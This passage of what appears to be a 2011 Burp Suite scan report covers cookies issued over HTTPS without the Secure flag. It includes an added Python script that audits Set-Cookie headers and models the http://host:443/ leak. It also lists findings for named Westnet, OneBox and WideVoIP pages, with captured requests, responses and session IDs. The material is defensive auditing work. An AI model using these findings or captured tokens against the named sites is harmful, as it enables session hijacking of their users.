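            print(f"{url}: password field(s) {fields} posted in clear to {action}")
```

Resolving the action against the page URL is what makes the relative cases (ekkows, mailsite, the phpBB ucp.php forms) count as clear-text: the attribute has no scheme, so the browser reuses the one the page was loaded over.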

7. SSL cookie without secure flag set
There are 16 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
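
The two things worth automating from the background and remediation above are the audit itself (which Set-Cookie headers from an HTTPS response lack Secure) and a demonstration of why the http://example.com:443/ link works: cookies are scoped by host and path, never by port or, without Secure, by scheme. The following script is an added example for this page, not Burp's code or the vendors'. WESTNET_LOGIN and ONEBOX_API are copied from the responses in 7.1 and 7.4 below; FIXED is a constructed, remediated version of the first; the "looks like a session token" name heuristic is this example's own assumption.

```python
"""Added example, not part of the Burp report above: audit Set-Cookie headers
from an HTTPS response for a missing Secure attribute and show why the
http://host:443/ trick from the issue background works.

WESTNET_LOGIN and ONEBOX_API are copied from the responses in 7.1 and 7.4;
FIXED is a constructed, remediated form of the first. The name heuristic for
"looks like a session token" is this example's own assumption.
"""
import re
from urllib.parse import urlsplit

WESTNET_LOGIN = "ASP.NET_SessionId=2qvhgrvniajgfqjmwl5x5sa3; path=/; HttpOnly"
ONEBOX_API = "JSESSIONID=FDD30FFE5335612BF4DF5723DD8963FB.onebox1a; Path=/ereceptionist-api"
FIXED = "ASP.NET_SessionId=2qvhgrvniajgfqjmwl5x5sa3; path=/; HttpOnly; Secure"  # constructed

SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.I)


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value|True}).

    Attribute names are case-insensitive (both path= and Path= occur above);
    flag attributes such as HttpOnly and Secure map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value, attrs


def missing_secure(set_cookie_headers):
    """Return one finding per cookie issued without the Secure attribute."""
    findings = []
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        if "secure" in attrs:
            continue
        findings.append({
            "name": name,
            "session_like": bool(SESSION_NAME_RE.search(name)),
            "httponly": "httponly" in attrs,
        })
    return findings


def _path_matches(request_path, cookie_path):
    """RFC 6265 path-match: exact, or a prefix ending in "/" or at a "/" boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def browser_would_send(header, issuing_host, url):
    """Would a browser attach this cookie to a request for `url`?

    Cookies are not port-scoped, so a cookie set by https://host is sent to
    http://host:443/ as well unless Secure is present; that is the attack path
    the issue background describes. Domain is host-only when no Domain
    attribute was set; Path defaults to "/" here (the samples set it explicitly).
    """
    _, _, attrs = parse_set_cookie(header)
    u = urlsplit(url)
    if "secure" in attrs and u.scheme.lower() != "https":
        return False
    domain = attrs.get("domain")
    if isinstance(domain, str) and domain:
        domain = domain.lstrip(".").lower()
        host_ok = u.hostname == domain or u.hostname.endswith("." + domain)
    else:
        host_ok = u.hostname == issuing_host.lower()
    if not host_ok:
        return False
    cookie_path = attrs.get("path")
    if not isinstance(cookie_path, str) or not cookie_path.startswith("/"):
        cookie_path = "/"
    return _path_matches(u.path or "/", cookie_path)


if __name__ == "__main__":
    for f in missing_secure([WESTNET_LOGIN, ONEBOX_API, FIXED]):
        print(f"{f['name']}: no Secure flag" + (" (session token)" if f["session_like"] else ""))
    leak_url = "http://myaccount.westnet.com.au:443/Login.aspx"
    print("sent over clear-text:", browser_would_send(WESTNET_LOGIN, "myaccount.westnet.com.au", leak_url))
    print("sent after fix:      ", browser_would_send(FIXED, "myaccount.westnet.com.au", leak_url))
```

Note that HttpOnly, which both sample cookies carry, does nothing against this attack: it keeps script away from the cookie but says nothing about the transport. Only Secure stops the browser from attaching the cookie to the http://host:443/ request.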


7.1. https://myaccount.westnet.com.au/Login.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccount.westnet.com.au
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=2qvhgrvniajgfqjmwl5x5sa3; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: myaccount.westnet.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58409516.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58409516.2058560745.1305465388.1305465388.1305465388.1; __utmb=58409516.2.10.1305465388; __utmc=58409516; s_cc=true; s_nr=1305465655463; s_pv15=retail; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:21:01 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2qvhgrvniajgfqjmwl5x5sa3; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 26237


<html>
<head>
<title>MyAccount - Login</title>
<!-- Tracking -->

<link rel="stylesheet" href="/css/headings/all.css" type="text/css" media="all" />
<link rel="stylesheet" href
...[SNIP]...

7.2. https://secure1.wn.com.au/passwordrecovery/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure1.wn.com.au
Path:   /passwordrecovery/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=czqop0naxbczvi2xp4s3vx45; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passwordrecovery/ HTTP/1.1
Host: secure1.wn.com.au
Connection: keep-alive
Referer: https://webmail.westnet.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:21:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=czqop0naxbczvi2xp4s3vx45; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 14817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Westnet - Password Recovery</title>
<meta name="Keywords" content="Wes
...[SNIP]...

7.3. https://webmail.westnet.com.au/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://webmail.westnet.com.au
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=2gs4tv45eo05uzi0yqtwyo2p; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: webmail.westnet.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58409516.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58409516.2058560745.1305465388.1305465388.1305465388.1; __utmb=58409516.1.10.1305465388; __utmc=58409516; s_cc=true; s_nr=1305465388009; s_pv15=general; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:20:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2gs4tv45eo05uzi0yqtwyo2p; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
       <title>Westnet MyEmail</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta cont
...[SNIP]...

7.4. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /ereceptionist-api/signup/getAllOBRatePlans

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=FDD30FFE5335612BF4DF5723DD8963FB.onebox1a; Path=/ereceptionist-api

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ereceptionist-api/signup/getAllOBRatePlans HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: https://www.new.onebox.com/pricing-receptionist_b
Origin: https://www.new.onebox.com
X-Request: JSON
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 15

accounttype=OBR

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=FDD30FFE5335612BF4DF5723DD8963FB.onebox1a; Path=/ereceptionist-api
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
X-TWA-Web: pa:27181
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 9978

{"api_results":{"returncode":"1","Rate_Plans":{"Rate_Plan":[{"overage_rate":"0.049","rebilling_amount":"109.70","rate_plan_name":"I09A","rate_plan_id":"1072","rppsid":"163","extensions":"9","freeminut
...[SNIP]...

7.5. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /ereceptionist-api/signup/getSessionCurrency

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=EE701BF46F63028FB09E78B74876E55F.onebox1b; Path=/ereceptionist-api

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ereceptionist-api/signup/getSessionCurrency HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: https://www.new.onebox.com/pricing-receptionist_b
Origin: https://www.new.onebox.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE701BF46F63028FB09E78B74876E55F.onebox1b; Path=/ereceptionist-api
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
X-TWA-Web: pb:27181
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 4

NULL

7.6. https://www.new.onebox.com/features/mobile-apps/android

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/android

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2EF0E2B285942486796C364C66E18DF6.onebox1a; Path=/onebox-cms-public

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/android HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:32 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=2EF0E2B285942486796C364C66E18DF6.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:32 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.7. https://www.new.onebox.com/features/mobile-apps/blackberry

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/blackberry

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/blackberry HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:31 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=051A33EDD70C71CD6EA4CD56F753975D.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:31 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.8. https://www.new.onebox.com/features/mobile-apps/iphone

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/iphone

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/iphone HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:29 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=D357415C3729797C4D0BC6ADCE3558A6.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:29 GMT
Vary: Accept-Encoding
X-TWA-Web: pb:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.9. https://www.new.onebox.com/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; s_cc=true; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; s_sq=j2globalonebox%3D%2526pid%253Dnew%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.new.onebox.com%25252Fpricing-receptionist%2526ot%253DA; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467692|check#true#1305465892

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:03 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=A40B60C7EA273119DA36EC3735BE3B51.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:03 GMT
Vary: Accept-Encoding
X-TWA-Web: pb:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 17786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.10. https://www.new.onebox.com/pricing-receptionist_b

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /pricing-receptionist_b

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pricing-receptionist_b HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: http://www.new.onebox.com/pricing-receptionist
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; s_cc=true; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; s_sq=j2globalonebox%3D%2526pid%253Dnew%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.new.onebox.com%25252Fpricing-receptionist%2526ot%253DA; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467692|check#true#1305465892|PC#1305465387100-728648.17#1307280235

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:23:59 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=D4A6BC2F1A577644443D0DF165FB2FF9.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:23:59 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.11. https://shop.widevoip.com/cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /cart.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.php?_=1305473212087&add&ajax=true&qty=1&id_product=4&token=c2f1dad279e86a94006caa0cd37aee00 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DTR8L%2FDHa3UE%3DaGT%2Bje8pLuM%3DlzyeSQtGF%2F4%3DtoENHMEg8KU%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:54 GMT
Server: Apache
